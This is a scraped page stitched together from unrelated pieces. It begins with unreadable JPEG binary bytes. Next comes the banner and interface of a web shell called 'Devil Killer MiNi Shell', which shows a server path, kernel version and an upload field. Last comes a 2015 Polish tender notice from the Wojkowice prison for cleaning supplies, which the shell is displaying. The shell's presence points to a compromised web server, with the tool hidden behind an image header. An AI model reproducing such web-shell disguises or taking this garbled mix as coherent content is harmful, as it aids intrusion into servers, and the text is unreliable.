JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150202/13975-N-2015.html

<p class="kh_header"><b>Wojkowice: Dostawa środków czystości.
D/Kw 220/2/15</b><br>
<b>Numer ogłoszenia: 13975 - 2015; data zamieszczenia: 02.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Sobieskiego 298, 42-580 Wojkowice, woj. śląskie, tel. 032 2961600, faks 032 2961613.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości.
D/Kw 220/2/15.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - Środki czystości ogólne.
1. Papier toaletowy dwuwarstwowy, celulozowy, biały, gofrowany, białość ok. 80%, gramatura nie mniej niż 2x16 g m2, perforacja co 11 cm, długość nie mniej niż 20 m, szerokość nie mniej niż 9,5 cm, średnica nie mniej niż 11,5 cm, tuleja ok. 45 mm, waga rolki bez tulei nie mniej niż 0,061 kg, tolerancja parametrów + - 5% - ilość  4000 rolek.
2. Środek odkażająco - dezynfekujący, typu LIZOL, lub równoważny tj o właściwościach odkażająco - dezynfekujących. Opakowanie ok 1l. - Ilość  1700 litrów.
3. Płyn do usuwania kamienia i rdzy z urządzeń sanitarnych. Opakowanie ok. 0,5 l. - Ilość 1000 litrów.
4. Mleczko do czyszczenia, usuwające brud, plamy, tłuszcz, nie rysujące powierzchni. Opakowanie ok. 0,5l. - Ilość 600 litrów.
5. Odświeżacz powietrza w żelu, długotrwały efekt zapachowy, opakowanie ok.150g. - Ilość 70 sztuk.
6. Preparat do pielęgnacji mebli, chroniący przed plamami i zaciekami, nadający połysk, antystatyczny, nie pozostawia smug. Opakowanie max. 0,5l. - Ilość 200 litrów.
7. Woreczki HDPE o wym. 26x35 cm, dopuszczone do kontaktu z żywnością, charakteryzujące się dużą wytrzymałością, opakowanie 1000 szt. - Ilość 25 opakowań.
8. Reklamówka jednorazowa o wym. 25x45 cm. charakteryzująca się dużą wytrzymałością, opakowanie 200szt. - ilość 80 opakowań.
9. Rękawice foliowe jednorazowe, dopuszczone do kontaktu z żywnością, charakteryzujące się dużą wytrzymałością,   rozmiar L opakowanie 100 szt. - Ilość 450 opakowań.
10. Kubki jednorazowe białe poj. 0,2 l. - Ilość 14000 sztuk.
11. Ściągaczka do ściągania wody z podłogi z możliwością montażu kija, szerokość 50-70 cm - Ilość 60 sztuk.
12. Szczotka do zamiatania, oprawa plastikowa z otworem do wkręcenia kija, miękkie włosie szer. ok. 30 cm. - Ilość 200 sztuk.
13. Szczotka ryżowa ręczna - Ilość 60 sztuk.
14. Szczotka ryżowa z otworem na kij - Ilość 60 sztuk.
15. Szczotka ulicówka do zamiatania terenów zewnętrznych z otworem na kij szerokość 30 - 40 cm - Ilość 50 sztuk.
16. Szczotka plastikowa do czyszczenia WC z podstawą - Ilość 100 kompletów.
17. Kij do miotły i mopa, drewniany, z gwintem na końcu, długość ok. 150cm. - Ilość 200 sztuk.
18. Zestaw zmiotka +szufelka - Ilość 150 kompletów.
19. Miska plastikowa okrągła o średnicy 40-50cm, wysokość 15-20 cm - Ilość 150 sztuk.
20. Wiadro plastikowe  o pojemności  10l. - Ilość 150 sztuk.
21. Zmywak - gąbka przeznaczona do mycia naczyń o dużej wytrzymałości i odporności na ścieranie. Z jednej strony gąbka, z drugiej materiał umożliwiający szorowanie - Ilość 200 sztuk.
22. Zestaw do sprzątania: mop sznurkowy + styl + wiadro +wyciskacz - Ilość 30 kompletów.
23. Wkład do mopa sznurkowego - Ilość 100 sztuk.
24. Kosz na śmieci z tworzywa , otwierany nogą tzw. pedałowy o pojemności 25l - Ilość 30 sztuk.
25. Zestaw do sprzątania: mop płaski styl wymiary mopa min. 400x100 mm - Ilość 50 kompletów.
26. Wkład do mopa płaskiego wymiary mopa min. 400x100 mm - Ilość 80 sztuk.
27. Pasta do obuwia, czarna, w płynie, poj 0,1 l - Ilość 10 sztuk.
28. Worki na śmieci koloru czerwonego o poj 60 litrów - ilość 1250 sztuk.
29. Tabletki do zmywarki usuwające zabrudzenia z naczyń. Możliwość stosowania w zmywarce BEKO. Opakowanie od 50 do 300 szt. - ilość 300 sztuk.
30. Sól do zmywarki, zapobiegająca osadzaniu się kamienia w urządzeniu. Możliwość stosowania w zmywarce BEKO. Opakowanie od 1 do 6 kg - ilość 6 kilogramów
31. Nabłyszczacz do zmywarki, do płukania i nabłyszczania naczyń. Możliwość stosowania w zmywarce BEKO. Opakowanie od 1 do 5 litrów - ilość 10 litrów
32. Krem do rąk. Opakowanie 50 ml. - ilość 200 szt.


Zadanie 2 Środki czystości na kuchnię
1. Środek do mycia urządzeń sanitarnych w zakładach gastronomicznych. Środek zawierający czynny chlor.  Opakowanie max. 15l. - Ilość 700 litrów.
2. Neutralny, skoncentrowany środek przeznaczony do ręcznego mycia naczyń w zakładach gastronomii.  Opakowanie max. 15l. - Ilość 2800 litrów.
3. Preparat myjący do rąk usuwający zabrudzenia organiczne i nieorganiczne oraz florę bakteryjną ze skóry rąk. Nie podrażniający skóry.  Opakowanie max. 15l. - Ilość 1600 litrów.
4. Alkaliczny środek do mycia i dezynfekcji maszyn, ścian oraz posadzek oraz wszelkich powierzchni produkcyjnych aluminiowe, ocynkowane. Preparat zawierający inhibitory korozji, charakteryzujący się wysokim działaniem bakteriobójczym, grzybobójczym i wirusobójczym, nie zawierający aktywnego chloru. Opakowanie max. 15l. - Ilość 2300 litrów.
5. Zasadowy płyn do mycia w zmywarkach do przyrządów kuchennych, garnków, tac , zawierający aktywny chlor, usuwający resztki jedzenia wszelkiego typu, szczególnie przyschnięte osady z białka i skrobii. możliwość stosowania w zmywarce WINTERHALTER GS 650 Opakowanie ok. 25l. - Ilość 400 litrów.
6. Kwaśny środek nabłyszczający do maszynowego i przemysłowego użycia płukania we wszystkich typach zmywarek. możliwość stosowania w zmywarce WINTERHALTER GS 650 Opakowanie max. 15l. - Ilość 500 litrów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.81.30.00-4, 39.81.13.00-3, 39.83.12.10-1, 39.81.22.00-9, 39.22.21.20-1, 39.22.10.00-8, 39.22.42.00-0, 39.22.43.10-4, 39.22.12.40-1, 39.22.43.30-0, 39.22.43.20-7, 39.22.43.40-3, 33.71.15.40-4, 33.76.00.00-5, 19.52.00.00-7, 18.42.43.00-0, 39.83.12.40-0, 39.83.20.00-3, 39.82.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony, mając na uwadze ewentualną zmianę stawek podatku od towarów i usług, zgodnie postanawiają, iż w przypadku ich zmiany na mocy powszechnie obowiązujących przepisów prawa, zmianie  może ulec cena jednostkowa brutto za poszczególny asortyment, przy zachowaniu następujących warunków:
1) w sytuacji podwyższenia stawki podatku od towarów i usług dla danego asortymentu - Wykonawca uprawniony jest do podwyższenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego - Formularzu cenowym, a stawką obowiązującą po zmianie stawki; Wykonawca nie jest uprawniony do podwyższenia ceny jednostkowej brutto za asortyment dostarczony Zamawiającemu przed dniem zmiany stawki podatku;
2) w sytuacji obniżenia stawki podatku od towarów i usług dla danego asortymentu - Wykonawca zobowiązany jest do obniżenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego - Formularzu cenowym, a stawką obowiązującą po zmianie stawki podatku.
W przypadkach określonych w pkt. 1 oraz 2 powyżej, każdorazowo niezmienna pozostaje cena netto danego asortymentu, stanowiąca podstawę do naliczenia podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Wojkowicach
ul. Sobieskiego 298
42-580 Wojkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2015 godzina 10:30, miejsce: Zakład Karny w Wojkowicach
ul. Sobieskiego 298
42-580 Wojkowice
sekretariat (wejście od strony ulicy Plaka, brama Aresztu Śledczego).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Środki czystości ogólne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Papier toaletowy dwuwarstwowy, celulozowy, biały, gofrowany, białość ok. 80%, gramatura nie mniej niż 2x16 g m2, perforacja co 11 cm, długość nie mniej niż 20 m, szerokość nie mniej niż 9,5 cm, średnica nie mniej niż 11,5 cm, tuleja ok. 45 mm, waga rolki bez tulei nie mniej niż 0,061 kg, tolerancja parametrów + - 5% - ilość  4000 rolek.
2. Środek odkażająco - dezynfekujący, typu LIZOL, lub równoważny tj o właściwościach odkażająco - dezynfekujących. Opakowanie ok 1l. - Ilość  1700 litrów.
3. Płyn do usuwania kamienia i rdzy z urządzeń sanitarnych. Opakowanie ok. 0,5 l. - Ilość 1000 litrów.
4. Mleczko do czyszczenia, usuwające brud, plamy, tłuszcz, nie rysujące powierzchni. Opakowanie ok. 0,5l. - Ilość 600 litrów.
5. Odświeżacz powietrza w żelu, długotrwały efekt zapachowy, opakowanie ok. 150g. - Ilość 70 sztuk.
6. Preparat do pielęgnacji mebli, chroniący przed plamami i zaciekami, nadający połysk, antystatyczny, nie pozostawia smug. Opakowanie max. 0,5l. - Ilość 200 litrów.
7. Woreczki HDPE o wym. 26x35 cm, dopuszczone do kontaktu z żywnością, charakteryzujące się dużą wytrzymałością, opakowanie 1000 szt. - Ilość 25 opakowań.
8. Reklamówka jednorazowa o wym. 25x45 cm., charakteryzująca się dużą wytrzymałością, opakowanie 200szt. - ilość 80 opakowań.
9. Rękawice foliowe jednorazowe, dopuszczone do kontaktu z żywnością, charakteryzujące się dużą wytrzymałością,   rozmiar L opakowanie 100 szt. - Ilość 450 opakowań.
10. Kubki jednorazowe białe poj. 0,2 l. - Ilość 14000 sztuk.
11. Ściągaczka do ściągania wody z podłogi z możliwością montażu kija, szerokość 50-70 cm - Ilość 60 sztuk.
12. Szczotka do zamiatania, oprawa plastikowa z otworem do wkręcenia kija, miękkie włosie szer. ok. 30 cm. - Ilość 200 sztuk.
13. Szczotka ryżowa ręczna - Ilość 60 sztuk.
14. Szczotka ryżowa z otworem na kij - Ilość 60 sztuk.
15. Szczotka ulicówka do zamiatania terenów zewnętrznych z otworem na kij szerokość 30 - 40 cm - Ilość 50 sztuk.
16. Szczotka plastikowa do czyszczenia WC z podstawą - Ilość 100 kompletów.
17. Kij do miotły i mopa, drewniany, z gwintem na końcu, długość ok. 150cm. - Ilość 200 sztuk.
18. Zestaw zmiotka +szufelka - Ilość 150 kompletów.
19. Miska plastikowa okrągła o średnicy 40-50cm, wysokość 15-20 cm - Ilość 150 sztuk.
20. Wiadro plastikowe  o pojemności  10l. - Ilość 150 sztuk.
21. Zmywak - gąbka przeznaczona do mycia naczyń o dużej wytrzymałości i odporności na ścieranie. Z jednej strony gąbka, z drugiej materiał umożliwiający szorowanie - Ilość 200 sztuk.
22. Zestaw do sprzątania mop sznurkowy + styl + wiadro +wyciskacz - Ilość 30 kompletów.
23. Wkład do mopa sznurkowego - Ilość 100 sztuk.
24. Kosz na śmieci z tworzywa , otwierany nogą tzw. pedałowy o pojemności 25l - Ilość 30 sztuk.
25. Zestaw do sprzątania: mop płaski +styl wymiary mopa min. 400x100 mm - Ilość 50 kompletów.
26. Wkład do mopa płaskiego (wymiary mopa min. 400x100 mm) - Ilość 80 sztuk.
27. Pasta do obuwia, czarna, w płynie, poj 0,1 l - Ilość 10 sztuk.
28. Worki na śmieci koloru czerwonego o poj 60 litrów - ilość 1250 sztuk.
29. Tabletki do zmywarki usuwające zabrudzenia z naczyń. Możliwość stosowania w zmywarce BEKO. Opakowanie od 50 do 300 szt. - ilość 300 sztuk.
30. Sól do zmywarki, zapobiegająca osadzaniu się kamienia w urządzeniu. Możliwość stosowania w zmywarce BEKO. Opakowanie od 1 do 6 kg - ilość 6 kilogramów
31. Nabłyszczacz do zmywarki, do płukania i nabłyszczania naczyń. Możliwość stosowania w zmywarce BEKO. Opakowanie od 1 do 5 litrów - ilość 10 litrów
32. Krem do rąk. Opakowanie 50 ml. - ilość 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 39.81.30.00-4, 39.81.13.00-3, 39.83.12.10-1, 39.81.22.00-9, 39.22.21.20-1, 39.22.10.00-8, 39.22.42.00-0, 39.22.43.10-4, 39.22.12.40-1, 39.22.43.30-0, 39.22.43.20-7, 39.22.43.40-3, 33.71.15.40-4, 33.76.00.00-5, 19.52.00.00-7, 18.42.43.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Środki czystości na kuchnię.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Środek do mycia urządzeń sanitarnych w zakładach gastronomicznych. Środek zawierający czynny chlor.  Opakowanie max. 15l. - Ilość 700 litrów.
2. Neutralny, skoncentrowany środek przeznaczony do ręcznego mycia naczyń w zakładach gastronomii.  Opakowanie max. 15l. - Ilość 2800 litrów.
